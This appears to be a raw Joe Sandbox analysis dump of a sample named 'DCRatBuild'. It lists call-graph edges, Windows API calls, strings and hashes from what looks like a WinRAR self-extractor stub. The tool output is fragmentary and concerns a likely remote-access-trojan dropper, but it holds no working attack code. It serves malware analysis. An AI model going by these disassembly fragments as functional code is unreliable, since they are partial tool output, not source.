23571->23525 23572->23571 23721 731951 23572->23721 23575 733ab8 23574->23575 23576 733abc 23574->23576 23575->23525 23577 733af7 23576->23577 23578 733ae9 23576->23578 23856 7327e8 97 API calls 3 library calls 23577->23856 23580 733b29 23578->23580 23855 733281 85 API calls 3 library calls 23578->23855 23580->23525 23582 733af5 23582->23580 23857 73204e 74 API calls 23582->23857 23585 738585 __EH_prolog 23584->23585 23586 7385be 
23585->23586 23590 7385c2 23585->23590 23880 7484bd 99 API calls 23585->23880 23587 7385e7 23586->23587 23586->23590 23593 73867a 23586->23593 23589 738609 23587->23589 23587->23590 23881 737b66 151 API calls 23587->23881 23589->23590 23882 7484bd 99 API calls 23589->23882 23590->23525 23593->23590 23858 735e3a 23593->23858 23595 738705 23595->23590 23864 73826a 23595->23864 23598 738875 23599 73a4c6 8 API calls 23598->23599 23601 7388e0 23598->23601 23599->23601 23600 73c991 80 API calls 23605 73893b _memcmp 23600->23605 23868 737d6c 23601->23868 23603 738a70 23604 738b43 23603->23604 23610 738abf 23603->23610 23609 738b9e 23604->23609 23619 738b4e 23604->23619 23605->23590 23605->23600 23605->23603 23606 738a69 23605->23606 23883 738236 82 API calls 23605->23883 23884 731f94 74 API calls 23605->23884 23885 731f94 74 API calls 23606->23885 23618 738b30 23609->23618 23888 7380ea 96 API calls 23609->23888 23612 73a180 4 API calls 23610->23612 23610->23618 23611 738b9c 23613 739653 79 API calls 23611->23613 23616 738af7 23612->23616 23613->23590 23615 739653 79 API calls 23615->23590 23616->23618 23886 739377 96 API calls 23616->23886 23617 738c09 23630 738c74 23617->23630 23666 7391c1 __except_handler4 23617->23666 23889 739989 23617->23889 23618->23611 23618->23617 23619->23611 23887 737f26 100 API calls __except_handler4 23619->23887 23620 73aa88 8 API calls 23623 738cc3 23620->23623 23626 73aa88 8 API calls 23623->23626 23625 738c4c 23625->23630 23893 731f94 74 API calls 23625->23893 23643 738cd9 23626->23643 23628 738c62 23894 737061 75 API calls 23628->23894 23630->23620 23631 738d9c 23632 738df7 23631->23632 23633 738efd 23631->23633 23634 738e69 23632->23634 23635 738e07 23632->23635 23637 738f23 23633->23637 23638 738f0f 23633->23638 23654 738e27 23633->23654 23636 73826a CharUpperW 23634->23636 23639 738e4d 23635->23639 23647 738e15 23635->23647 23640 738e84 23636->23640 23642 742c42 75 API calls 23637->23642 23641 7392e6 121 API calls 23638->23641 
23639->23654 23897 737907 108 API calls 23639->23897 23650 738eb4 23640->23650 23651 738ead 23640->23651 23640->23654 23641->23654 23645 738f3c 23642->23645 23643->23631 23895 739b21 SetFilePointer GetLastError SetEndOfFile 23643->23895 23900 7428f1 121 API calls 23645->23900 23896 731f94 74 API calls 23647->23896 23899 739224 94 API calls __EH_prolog 23650->23899 23898 737698 84 API calls __except_handler4 23651->23898 23657 73904b 23654->23657 23901 731f94 74 API calls 23654->23901 23656 739156 23658 73a444 4 API calls 23656->23658 23656->23666 23657->23656 23659 739104 23657->23659 23657->23666 23874 739ebf SetEndOfFile 23657->23874 23660 7391b1 23658->23660 23875 739d62 23659->23875 23660->23666 23902 731f94 74 API calls 23660->23902 23663 73914b 23665 7396d0 75 API calls 23663->23665 23665->23656 23666->23615 23668 731643 23667->23668 23917 73c8ca 23668->23917 23671->23522 23673 73b087 __EH_prolog 23672->23673 23678 73ea80 80 API calls 23673->23678 23675 73b099 23679 73b195 23675->23679 23678->23675 23680 73b1a7 ___scrt_fastfail 23679->23680 23683 740948 23680->23683 23686 740908 GetCurrentProcess GetProcessAffinityMask 23683->23686 23687 73b10f 23686->23687 23687->23543 23688->23546 23694 7316d2 23689->23694 23691 7370b9 23691->23560 23692->23558 23693->23561 23695 731740 __vswprintf_c_l 23694->23695 23696 7316e8 23694->23696 23695->23691 23697 731711 23696->23697 23707 736e91 74 API calls __vswprintf_c_l 23696->23707 23698 731767 23697->23698 23704 73172d ___std_exception_copy 23697->23704 23701 7535de 22 API calls 23698->23701 23700 731707 23708 736efd 75 API calls 23700->23708 23702 73176e 23701->23702 23702->23695 23710 736efd 75 API calls 23702->23710 23704->23695 23709 736efd 75 API calls 23704->23709 23707->23700 23708->23697 23709->23695 23710->23695 23712 740c56 __vswprintf_c_l 23711->23712 23712->23566 23714 74d527 23713->23714 23715 73ddd1 53 API calls 23714->23715 23716 74d54a 23715->23716 23717 73400a _swprintf 51 API calls 23716->23717 23718 
74d55c 23717->23718 23719 74cb5a 16 API calls 23718->23719 23720 741372 23719->23720 23720->23521 23722 731961 23721->23722 23724 73195d 23721->23724 23725 731896 23722->23725 23724->23571 23726 7318a8 23725->23726 23727 7318e5 23725->23727 23728 733aac 97 API calls 23726->23728 23733 733f18 23727->23733 23731 7318c8 23728->23731 23731->23724 23737 733f21 23733->23737 23734 733aac 97 API calls 23734->23737 23735 731906 23735->23731 23738 731e00 23735->23738 23737->23734 23737->23735 23750 74067c 23737->23750 23739 731e0a __EH_prolog 23738->23739 23758 733b3d 23739->23758 23741 731e34 23742 7316d2 76 API calls 23741->23742 23744 731ebb 23741->23744 23743 731e4b 23742->23743 23786 731849 76 API calls 23743->23786 23744->23731 23746 731e63 23748 731e6f 23746->23748 23787 74137a MultiByteToWideChar 23746->23787 23788 731849 76 API calls 23748->23788 23751 740683 23750->23751 23752 74069e 23751->23752 23756 736e8c RaiseException FindHandler 23751->23756 23754 7406af SetThreadExecutionState 23752->23754 23757 736e8c RaiseException FindHandler 23752->23757 23754->23737 23756->23752 23757->23754 23759 733b47 __EH_prolog 23758->23759 23760 733b79 23759->23760 23761 733b5d 23759->23761 23763 733dc2 23760->23763 23766 733ba5 23760->23766 23817 736dc1 74 API calls 23761->23817 23834 736dc1 74 API calls 23763->23834 23765 733b68 23765->23741 23766->23765 23789 742c42 23766->23789 23768 733c26 23769 733cb1 23768->23769 23785 733c1d 23768->23785 23820 73c991 23768->23820 23802 73aa88 23769->23802 23770 733c22 23770->23768 23819 732034 76 API calls 23770->23819 23772 733c12 23818 736dc1 74 API calls 23772->23818 23773 733bf4 23773->23768 23773->23770 23773->23772 23775 733cc4 23779 733d48 23775->23779 23780 733d3e 23775->23780 23826 7428f1 121 API calls 23779->23826 23806 7392e6 23780->23806 23783 733d46 23783->23785 23827 731f94 74 API calls 23783->23827 23828 741acf 23785->23828 23786->23746 23787->23748 23788->23744 23790 742c51 23789->23790 23792 742c5b 23789->23792 23835 
736efd 75 API calls 23790->23835 23793 742ca2 ___std_exception_copy 23792->23793 23794 742c9d Concurrency::cancel_current_task 23792->23794 23801 742cfd ___scrt_fastfail 23792->23801 23796 742da9 Concurrency::cancel_current_task 23793->23796 23797 742cd9 23793->23797 23793->23801 23837 75157a RaiseException 23794->23837 23838 75157a RaiseException 23796->23838 23836 742b7b 75 API calls 4 library calls 23797->23836 23800 742dc1 23801->23773 23801->23801 23803 73aa95 23802->23803 23805 73aa9f 23802->23805 23804 74e24a new 8 API calls 23803->23804 23804->23805 23805->23775 23807 7392f0 __EH_prolog 23806->23807 23839 737dc6 23807->23839 23810 73709d 76 API calls 23811 739302 23810->23811 23842 73ca6c 23811->23842 23813 73935c 23813->23783 23815 73ca6c 114 API calls 23816 739314 23815->23816 23816->23813 23816->23815 23851 73cc51 97 API calls __vswprintf_c_l 23816->23851 23817->23765 23818->23785 23819->23768 23821 73c9b2 23820->23821 23822 73c9c4 23820->23822 23852 736249 80 API calls 23821->23852 23853 736249 80 API calls 23822->23853 23825 73c9bc 23825->23769 23826->23783 23827->23785 23829 741ad9 23828->23829 23830 741af2 23829->23830 23833 741b06 23829->23833 23854 74075b 84 API calls 23830->23854 23832 741af9 23832->23833 23834->23765 23835->23792 23836->23801 23837->23796 23838->23800 23840 73acf5 GetVersionExW 23839->23840 23841 737dcb 23840->23841 23841->23810 23849 73ca82 __vswprintf_c_l 23842->23849 23843 73cbf7 23844 73cc1f 23843->23844 23845 73ca0b 6 API calls 23843->23845 23846 74067c SetThreadExecutionState RaiseException 23844->23846 23845->23844 23848 73cbee 23846->23848 23847 7484bd 99 API calls 23847->23849 23848->23816 23849->23843 23849->23847 23849->23848 23850 73ab70 89 API calls 23849->23850 23850->23849 23851->23816 23852->23825 23853->23825 23854->23832 23855->23582 23856->23582 23857->23580 23859 735e4a 23858->23859 23903 735d67 23859->23903 23862 735e7d 23863 735eb5 23862->23863 23908 73ad65 CharUpperW CompareStringW 23862->23908 23863->23595 
23865 738289 23864->23865 23914 74179d CharUpperW 23865->23914 23867 738333 23867->23598 23869 737d7b 23868->23869 23870 737dbb 23869->23870 23915 737043 74 API calls 23869->23915 23870->23605 23872 737db3 23916 736dc1 74 API calls 23872->23916 23874->23659 23876 739d73 23875->23876 23878 739d82 23875->23878 23877 739d79 FlushFileBuffers 23876->23877 23876->23878 23877->23878 23879 739dfb SetFileTime 23878->23879 23879->23663 23880->23586 23881->23589 23882->23590 23883->23605 23884->23605 23885->23603 23886->23618 23887->23611 23888->23618 23890 739992 GetFileType 23889->23890 23891 73998f 23889->23891 23892 7399a0 23890->23892 23891->23625 23892->23625 23893->23628 23894->23630 23895->23631 23896->23654 23897->23654 23898->23654 23899->23654 23900->23654 23901->23657 23902->23666 23909 735c64 23903->23909 23905 735d88 23905->23862 23907 735c64 2 API calls 23907->23905 23908->23862 23910 735c6e 23909->23910 23912 735d56 23910->23912 23913 73ad65 CharUpperW CompareStringW 23910->23913 23912->23905 23912->23907 23913->23910 23914->23867 23915->23872 23916->23870 23918 73c8db 23917->23918 23923 73a90e 84 API calls 23918->23923 23920 73c90d 23924 73a90e 84 API calls 23920->23924 23922 73c918 23923->23920 23924->23922 23926 73a5fe 23925->23926 23927 73a691 FindNextFileW 23926->23927 23928 73a621 FindFirstFileW 23926->23928 23929 73a6b0 23927->23929 23930 73a69c GetLastError 23927->23930 23931 73a638 23928->23931 23936 73a675 23928->23936 23929->23936 23930->23929 23932 73b66c 2 API calls 23931->23932 23933 73a64d 23932->23933 23934 73a651 FindFirstFileW 23933->23934 23935 73a66a GetLastError 23933->23935 23934->23935 23934->23936 23935->23936 23936->23532 23946 749d39 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23937->23946 23939 749d2d 23939->23279 23939->23280 23940 749d21 23940->23939 23947 749d5a GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23940->23947 23942->23283 23943->23289 23944->23289 23945->23292 23946->23940 23947->23939 23948->23299 23950 739ef7 76 API 
calls 23949->23950 23951 731f5b 23950->23951 23952 7319a6 97 API calls 23951->23952 23955 731f78 23951->23955 23953 731f68 23952->23953 23953->23955 23956 736dc1 74 API calls 23953->23956 23955->23308 23955->23309 23956->23955 24825 74b8e0 93 API calls _swprintf 24826 748ce0 6 API calls 24829 7616e0 CloseHandle 24830 74acd0 100 API calls 24876 7419d0 26 API calls std::bad_exception::bad_exception 23962 7310d5 23967 735bd7 23962->23967 23968 735be1 __EH_prolog 23967->23968 23969 73b07d 82 API calls 23968->23969 23970 735bed 23969->23970 23976 735dcc GetCurrentProcess GetProcessAffinityMask 23970->23976 23985 74ead2 23986 74eade ___DestructExceptionObject 23985->23986 24011 74e5c7 23986->24011 23988 74eae5 23990 74eb0e 23988->23990 24091 74ef05 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 23988->24091 23997 74eb4d ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 23990->23997 24022 75824d 23990->24022 23994 74eb2d ___DestructExceptionObject 23995 74ebad 24030 74f020 23995->24030 23997->23995 24092 757243 38 API calls 2 library calls 23997->24092 24006 74ebd9 24008 74ebe2 24006->24008 24093 75764a 28 API calls _abort 24006->24093 24094 74e73e 13 API calls 2 library calls 24008->24094 24012 74e5d0 24011->24012 24095 74ed5b IsProcessorFeaturePresent 24012->24095 24014 74e5dc 24096 752016 24014->24096 24016 74e5e1 24021 74e5e5 24016->24021 24105 7580d7 24016->24105 24019 74e5fc 24019->23988 24021->23988 24025 758264 24022->24025 24023 74ec4a _ValidateLocalCookies 5 API calls 24024 74eb27 24023->24024 24024->23994 24026 7581f1 24024->24026 24025->24023 24027 758220 24026->24027 24028 74ec4a _ValidateLocalCookies 5 API calls 24027->24028 24029 758249 24028->24029 24029->23997 24155 74f350 24030->24155 24033 74ebb3 24034 75819e 24033->24034 24157 75b290 24034->24157 24036 7581a7 24037 74ebbc 24036->24037 24161 75b59a 38 API calls 24036->24161 24039 74d5d4 24037->24039 24296 7400cf 
24039->24296 24043 74d5f3 24345 74a335 24043->24345 24045 74d5fc 24349 7413b3 GetCPInfo 24045->24349 24047 74d606 ___scrt_fastfail 24048 74d619 GetCommandLineW 24047->24048 24049 74d6a6 GetModuleFileNameW SetEnvironmentVariableW GetLocalTime 24048->24049 24050 74d628 24048->24050 24051 73400a _swprintf 51 API calls 24049->24051 24352 74bc84 24050->24352 24053 74d70d SetEnvironmentVariableW GetModuleHandleW LoadIconW 24051->24053 24363 74aded LoadBitmapW 24053->24363 24056 74d636 OpenFileMappingW 24060 74d696 CloseHandle 24056->24060 24061 74d64f MapViewOfFile 24056->24061 24057 74d6a0 24357 74d287 24057->24357 24060->24049 24063 74d660 __vswprintf_c_l 24061->24063 24064 74d68d UnmapViewOfFile 24061->24064 24068 74d287 2 API calls 24063->24068 24064->24060 24070 74d67c 24068->24070 24069 748835 8 API calls 24071 74d76a DialogBoxParamW 24069->24071 24070->24064 24072 74d7a4 24071->24072 24073 74d7b6 Sleep 24072->24073 24074 74d7bd 24072->24074 24073->24074 24076 74d7cb 24074->24076 24393 74a544 CompareStringW SetCurrentDirectoryW ___scrt_fastfail 24074->24393 24077 74d7ea DeleteObject 24076->24077 24078 74d806 24077->24078 24079 74d7ff DeleteObject 24077->24079 24080 74d837 24078->24080 24081 74d849 24078->24081 24079->24078 24394 74d2e6 6 API calls 24080->24394 24390 74a39d 24081->24390 24083 74d83d CloseHandle 24083->24081 24085 74d883 24086 75757e GetModuleHandleW 24085->24086 24087 74ebcf 24086->24087 24087->24006 24088 7576a7 24087->24088 24530 757424 24088->24530 24091->23988 24092->23995 24093->24008 24094->23994 24095->24014 24097 75201b ___vcrt_initialize_pure_virtual_call_handler ___vcrt_initialize_winapi_thunks 24096->24097 24109 75310e 24097->24109 24100 752029 24100->24016 24102 752031 24103 75203c 24102->24103 24123 75314a DeleteCriticalSection 24102->24123 24103->24016 24151 75b73a 24105->24151 24108 75203f 8 API calls 3 library calls 24108->24021 24110 753117 24109->24110 24112 753140 24110->24112 24114 752025 24110->24114 24124 753385 24110->24124 

                                        Control-flow Graph

                                        APIs
                                          • Part of subcall function 007400CF: GetModuleHandleW.KERNEL32(kernel32), ref: 007400E4
                                          • Part of subcall function 007400CF: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 007400F6
                                          • Part of subcall function 007400CF: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00740127
                                          • Part of subcall function 00749DA4: GetCurrentDirectoryW.KERNEL32(?,?), ref: 00749DAC
                                          • Part of subcall function 0074A335: OleInitialize.OLE32(00000000), ref: 0074A34E
                                          • Part of subcall function 0074A335: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0074A385
                                          • Part of subcall function 0074A335: SHGetMalloc.SHELL32(00778430), ref: 0074A38F
                                          • Part of subcall function 007413B3: GetCPInfo.KERNEL32(00000000,?), ref: 007413C4
                                          • Part of subcall function 007413B3: IsDBCSLeadByte.KERNEL32(00000000), ref: 007413D8
                                        • GetCommandLineW.KERNEL32 ref: 0074D61C
                                        • OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 0074D643
                                        • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 0074D654
                                        • UnmapViewOfFile.KERNEL32(00000000), ref: 0074D68E
                                          • Part of subcall function 0074D287: SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 0074D29D
                                          • Part of subcall function 0074D287: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 0074D2D9
                                        • CloseHandle.KERNEL32(00000000), ref: 0074D697
                                        • GetModuleFileNameW.KERNEL32(00000000,0078DC90,00000800), ref: 0074D6B2
                                        • SetEnvironmentVariableW.KERNEL32(sfxname,0078DC90), ref: 0074D6BE
                                        • GetLocalTime.KERNEL32(?), ref: 0074D6C9
                                        • _swprintf.LIBCMT ref: 0074D708
                                        • SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 0074D71A
                                        • GetModuleHandleW.KERNEL32(00000000), ref: 0074D721
                                        • LoadIconW.USER32(00000000,00000064), ref: 0074D738
                                        • DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001AEE0,00000000), ref: 0074D789
                                        • Sleep.KERNEL32(?), ref: 0074D7B7
                                        • DeleteObject.GDI32 ref: 0074D7F0
                                        • DeleteObject.GDI32(?), ref: 0074D800
                                        • CloseHandle.KERNEL32 ref: 0074D843
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$ByteCommandCurrentDialogDirectoryGdiplusIconInfoInitializeLeadLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
                                        • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\Desktop$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp$xjx
                                        • API String ID: 788466649-1079212837
                                        • Opcode ID: 517ec9774a549bb474eb6384f1bba7fd478944a913783681eabe2c4c4ca7e1d8
                                        • Instruction ID: 53c3562cf8a3374f514a2d64ee677cf286f03c8a2811a8dc6c367d489705a88f
                                        • Opcode Fuzzy Hash: 517ec9774a549bb474eb6384f1bba7fd478944a913783681eabe2c4c4ca7e1d8
                                        • Instruction Fuzzy Hash: D861C6B1940345FFD320AF65DC4DF2A37ACAB45785F048429F58A92192EBBCCD44C7AA

                                        Control-flow Graph

                                        APIs
                                        • FindResourceW.KERNEL32(0074AE4D,PNG,?,?,?,0074AE4D,00000066), ref: 00749E2E
                                        • SizeofResource.KERNEL32(00000000,00000000,?,?,?,0074AE4D,00000066), ref: 00749E46
                                        • LoadResource.KERNEL32(00000000,?,?,?,0074AE4D,00000066), ref: 00749E59
                                        • LockResource.KERNEL32(00000000,?,?,?,0074AE4D,00000066), ref: 00749E64
                                        • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,0074AE4D,00000066), ref: 00749E82
                                        • GlobalLock.KERNEL32(00000000), ref: 00749E93
                                        • CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 00749EB7
                                        • GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00749EFC
                                        • GlobalUnlock.KERNEL32(00000000), ref: 00749F1B
                                        • GlobalFree.KERNEL32(00000000), ref: 00749F22
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: Global$Resource$CreateLock$AllocBitmapFindFreeFromGdipLoadSizeofStreamUnlock
                                        • String ID: PNG
                                        • API String ID: 3656887471-364855578
                                        • Opcode ID: b97c7f3822b52bc7af26c50c1761e1b85ab3b8a4defb6559d0569bdcace25e7a
                                        • Instruction ID: cce39074dda704cef03873baff82a2e39bc9f581b699a19d4b00bd9f85a05571
                                        • Opcode Fuzzy Hash: b97c7f3822b52bc7af26c50c1761e1b85ab3b8a4defb6559d0569bdcace25e7a
                                        • Instruction Fuzzy Hash: AB31C271604706EFC7109F61DC48D2BBBADFF86751B048528FA06D2260DBBADC04CAA4

                                        Control-flow Graph

                                        APIs
                                        • FindFirstFileW.KERNELBASE(?,?,?,?,?,?,0073A4EF,000000FF,?,?), ref: 0073A628
                                        • FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,0073A4EF,000000FF,?,?), ref: 0073A65E
                                        • GetLastError.KERNEL32(?,?,00000800,?,?,?,?,0073A4EF,000000FF,?,?), ref: 0073A66A
                                        • FindNextFileW.KERNEL32(?,?,?,?,?,?,0073A4EF,000000FF,?,?), ref: 0073A692
                                        • GetLastError.KERNEL32(?,?,?,?,0073A4EF,000000FF,?,?), ref: 0073A69E
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: FileFind$ErrorFirstLast$Next
                                        • String ID:
                                        • API String ID: 869497890-0
                                        • Opcode ID: 45866734ec418b247581aa169de5d775ebf1a0a65eae72ff3f441b73e7cbc47b
                                        • Instruction ID: 5abe8d7f214833f22cb80c97baa2d97bc5754ffab0da9e5610f16482279a0dfe
                                        • Opcode Fuzzy Hash: 45866734ec418b247581aa169de5d775ebf1a0a65eae72ff3f441b73e7cbc47b
                                        • Instruction Fuzzy Hash: 4C418372604341EFD320EF68C885ADAF7E8BF49340F044A29F6D9D3211D778A958CB92
                                        APIs
                                        • GetCurrentProcess.KERNEL32(00000000,?,00757513,00000000,0076BAD8,0000000C,0075766A,00000000,00000002,00000000), ref: 0075755E
                                        • TerminateProcess.KERNEL32(00000000,?,00757513,00000000,0076BAD8,0000000C,0075766A,00000000,00000002,00000000), ref: 00757565
                                        • ExitProcess.KERNEL32 ref: 00757577
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: Process$CurrentExitTerminate
                                        • String ID:
                                        • API String ID: 1703294689-0
                                        • Opcode ID: dfcf521eb8c8fb310ac0a276facff00e7e15120d5c4c6ade39590a96dc01c138
                                        • Instruction ID: 850f221d3be6b95a1187e4fa96671066fe87c3893f3bde26b735bb85692afe9a
                                        • Opcode Fuzzy Hash: dfcf521eb8c8fb310ac0a276facff00e7e15120d5c4c6ade39590a96dc01c138
                                        • Instruction Fuzzy Hash: FCE0BF31404648EBCF15AF54DD0DA893B6AEB41742F10C414FD064B122DBBDDE56CA54
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: H_prolog_memcmp
                                        • String ID:
                                        • API String ID: 3004599000-0
                                        • Opcode ID: 86b05d72ae292987c799208af3b7f4c17670b6273c412e082b96b9dc1eb86bf1
                                        • Instruction ID: d29b84118f870a9bde2a34f3fabb479aafa95b4ca17fd95463948aea888e1048
                                        • Opcode Fuzzy Hash: 86b05d72ae292987c799208af3b7f4c17670b6273c412e082b96b9dc1eb86bf1
                                        • Instruction Fuzzy Hash: 91822971904346EEFF25DB64C885BFABBB9AF05300F0840B9F9499B143DB795A48CB61
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 0074AEE5
                                          • Part of subcall function 0073130B: GetDlgItem.USER32(00000000,00003021), ref: 0073134F
                                          • Part of subcall function 0073130B: SetWindowTextW.USER32(00000000,007635B4), ref: 00731365
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: H_prologItemTextWindow
                                        • String ID: "%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$C:\Users\user\Desktop$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$winrarsfxmappingfile.tmp
                                        • API String ID: 810644672-8108337
                                        • Opcode ID: b4f1f11e9b657d42719d5ae9497b4171f06ebe01290cf7d61e70a74b879bcb0b
                                        • Instruction ID: 982498a917a9b95938718494927c3371305b57080ff33d1cf191fc8c54819670
                                        • Opcode Fuzzy Hash: b4f1f11e9b657d42719d5ae9497b4171f06ebe01290cf7d61e70a74b879bcb0b
                                        • Instruction Fuzzy Hash: D342D6B1A84244BEEB21AFA4DC4EFBE777CAB01744F008155F605A60D2DBBC8D45CB66

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 257 7400cf-7400ee call 74e360 GetModuleHandleW 260 740154-7403b2 257->260 261 7400f0-740107 GetProcAddress 257->261 264 740484-7404b3 GetModuleFileNameW call 73bc85 call 73fe56 260->264 265 7403b8-7403c3 call 7570dd 260->265 262 740121-740131 GetProcAddress 261->262 263 740109-74011f 261->263 262->260 266 740133-740152 262->266 263->262 280 7404b5-7404bf call 73acf5 264->280 265->264 274 7403c9-7403fa GetModuleFileNameW CreateFileW 265->274 266->260 275 7403fc-74040a SetFilePointer 274->275 276 740478-74047f CloseHandle 274->276 275->276 278 74040c-740429 ReadFile 275->278 276->264 278->276 282 74042b-740450 278->282 285 7404c1-7404c5 call 740085 280->285 286 7404cc 280->286 284 74046d-740476 call 73fbd8 282->284 284->276 294 740452-74046c call 740085 284->294 291 7404ca 285->291 289 7404ce-7404d0 286->289 292 7404f2-740518 call 73bcfb GetFileAttributesW 289->292 293 7404d2-7404f0 CompareStringW 289->293 291->289 296 74051a-74051e 292->296 301 740522 292->301 293->292 293->296 294->284 296->280 300 740520 296->300 302 740526-740528 300->302 301->302 303 740560-740562 302->303 304 74052a 302->304 306 74066f-740679 303->306 307 740568-74057f call 73bccf call 73acf5 303->307 305 74052c-740552 call 73bcfb GetFileAttributesW 304->305 312 740554-740558 305->312 313 74055c 305->313 317 7405e7-74061a call 73400a AllocConsole 307->317 318 740581-7405e2 call 740085 * 2 call 73ddd1 call 73400a call 73ddd1 call 749f35 307->318 312->305 